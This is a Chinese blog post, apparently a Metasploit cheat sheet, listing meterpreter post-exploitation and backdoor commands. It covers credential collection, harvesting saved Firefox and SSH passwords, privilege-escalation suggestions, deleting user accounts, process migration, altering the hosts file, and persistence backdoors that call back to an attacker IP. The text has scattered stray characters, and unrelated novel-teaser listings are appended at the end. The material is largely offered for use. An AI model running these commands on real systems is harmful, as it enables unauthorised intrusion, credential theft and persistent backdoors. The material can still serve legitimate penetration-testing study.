POST模塊、后門

msf exploit(psexec) > use exploit/multi/handler

msf exploit(handler) > set exitonsession false ?運行這條命令后轩缤，4444端口會一直處于偵聽狀態(tài)

msf exploit(handler) > exploit -j -z

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.80.0/24

meterpreter > run post/windows/gather/credentials/credential_collector ?目標主機上的身份認證信息

meterpreter >? run post/windows/gather/enum_applications ?目標主機安裝了哪些軟件

meterpreter >? run post/windows/gather/enum_logged_on_users ?目標主機當前在線的用戶(SID=500是管理員賬號)

meterpreter > run post/windows/gather/enum_snmp ?枚舉snmp信息

meterpreter >? run post/multi/recon/local_exploit_suggester ?目標主機存在哪些本地提權(quán)漏洞

meterpreter > run post/windows/manage/delete_user USERNAME=a? 刪除目標主機的a賬號

meterpreter > run post/multi/gather/env? 目標主機環(huán)境變量信息

meterpreter > run post/multi/gather/firefox_creds? 目標主機火狐瀏覽器保存的賬號密碼

meterpreter > run post/multi/gather/ssh_creds? 目標主機保存的ssh身份驗證信息(linux系統(tǒng)常用)

meterpreter > getpid

meterpreter > ps

meterpreter > migrate -N explorer.exe ?將meterpreter進程轉(zhuǎn)移到explorer.exe中

自動執(zhí)行post模塊

實例：獲得shell后，自動執(zhí)行migrate命令來遷移進程

msf exploit(handler) > show advanced ?查看高級參數(shù)

msf exploit(handler) > set autorunscript migrate -n explorer.exe

msf exploit(handler) > exploit

自動遷移進程

或者使用post/windows/manage/migrate模塊谊囚，同樣能達到遷移進程的效果急侥。

meterpreter > info post/windows/manage/migrate? 查看模塊的詳細信息

msf exploit(handler) > set autorunscript post/windows/manage/migrate name=explorer.exe spawn=false

msf exploit(handler) > exploit

msf exploit(handler) > set initialautorunscript post/windows/manage/migrate ?成功exploit后，自動執(zhí)行migrate模塊(before AutoRunScript)

meterpreter > run post/windows/manage/inject_host ip=1.1.1.1 domain=www.baidu.com ?修改目標主機的host文件

這些只是一小部分post模塊姚垃，在meterpreter下按兩下tab鍵念链，有200多個post模塊，可以多嘗試使用积糯！

后門

meterpreter > run persistence -X -i 5 -p 1234 -r 192.168.80.163 ?向目標主機的注冊表添加鍵值钓账，使后門程序開機自啟

msf > resource handler.rc? 可以直接獲得目標主機的shell，注意此時lport是1234

meterpreter > run persistence -X -i 5 -p 77 -T /root/ccc.exe -r 192.168.80.163? 用-T選項指定上傳的執(zhí)行程序是ccc.exe

最后編輯于：2017.12.06 13:46:52

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末絮宁，一起剝皮案震驚了整個濱河市，隨后出現(xiàn)的幾起案子服协，更是在濱河造成了極大的恐慌绍昂，老刑警劉巖，帶你破解...
沈念sama閱讀 221,548評論 6贊 515
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件偿荷，死亡現(xiàn)場離奇詭異窘游，居然都是意外死亡，警方通過查閱死者的電腦和手機跳纳，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 94,497評論 3贊 399
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進店門忍饰，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人寺庄，你說我怎么就攤上這事艾蓝×Τ纾” “怎么了？”我有些...
開封第一講書人閱讀 167,990評論 0贊 360
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵赢织，是天一觀的道長亮靴。經(jīng)常有香客問我，道長于置，這世上最難降的妖魔是什么茧吊？我笑而不...
開封第一講書人閱讀 59,618評論 1贊 296
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮八毯，結(jié)果婚禮上搓侄，老公的妹妹穿的比我還像新娘。我一直安慰自己话速，他們只是感情好讶踪，可當我...
茶點故事閱讀 68,618評論 6贊 397
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布。她就那樣靜靜地躺著尿孔，像睡著了一般俊柔。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上活合，一...
開封第一講書人閱讀 52,246評論 1贊 308
城市分裂傳說
那天雏婶，我揣著相機與錄音，去河邊找鬼白指。笑死留晚，一個胖子當著我的面吹牛，可吹牛的內(nèi)容都是我干的告嘲。我是一名探鬼主播错维，決...
沈念sama閱讀 40,819評論 3贊 421
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長吁一口氣：“原來是場噩夢啊……” “哼橄唬！你這毒婦竟也來了赋焕？” 一聲冷哼從身側(cè)響起，我...
開封第一講書人閱讀 39,725評論 0贊 276
萬榮殺人案實錄
序言：老撾萬榮一對情侶失蹤仰楚，失蹤者是張志新（化名）和其女友劉穎隆判，沒想到半個月后，有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體僧界，經(jīng)...
沈念sama閱讀 46,268評論 1贊 320
?護林員之死
正文獨居荒郊野嶺守林人離奇死亡侨嘀，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點故事閱讀 38,356評論 3贊 340
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時候發(fā)現(xiàn)自己被綠了捂襟。大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片咬腕。...
茶點故事閱讀 40,488評論 1贊 352
活死人
序言：一個原本活蹦亂跳的男人離奇死亡，死狀恐怖葬荷，靈堂內(nèi)的尸體忽然破棺而出涨共，到底是詐尸還是另有隱情纽帖，我是刑警寧澤，帶...
沈念sama閱讀 36,181評論 5贊 350
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布煞赢，位于F島的核電站抛计，受9級特大地震影響，放射性物質(zhì)發(fā)生泄漏照筑。R本人自食惡果不足惜吹截，卻給世界環(huán)境...
茶點故事閱讀 41,862評論 3贊 333
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望凝危。院中可真熱鬧波俄，春花似錦、人聲如沸蛾默。這莊子的主人今日做“春日...
開封第一講書人閱讀 32,331評論 0贊 24
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽支鸡。三九已至冬念，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間牧挣，已是汗流浹背急前。一陣腳步聲響...
開封第一講書人閱讀 33,445評論 1贊 272
情欲美人皮
我被黑心中介騙來泰國打工，沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留瀑构，地道東北人裆针。一個月前我還...
沈念sama閱讀 48,897評論 3贊 376
代替公主和親
正文我出身青樓，卻偏偏與公主長得像寺晌，于是被迫代替她去往敵國和親世吨。傳聞我的和親對象是個殘疾皇子，可洞房花燭夜當晚...
茶點故事閱讀 45,500評論 2贊 359

POST模塊友瘤、后門

POST模塊、后門

推薦閱讀更多精彩內(nèi)容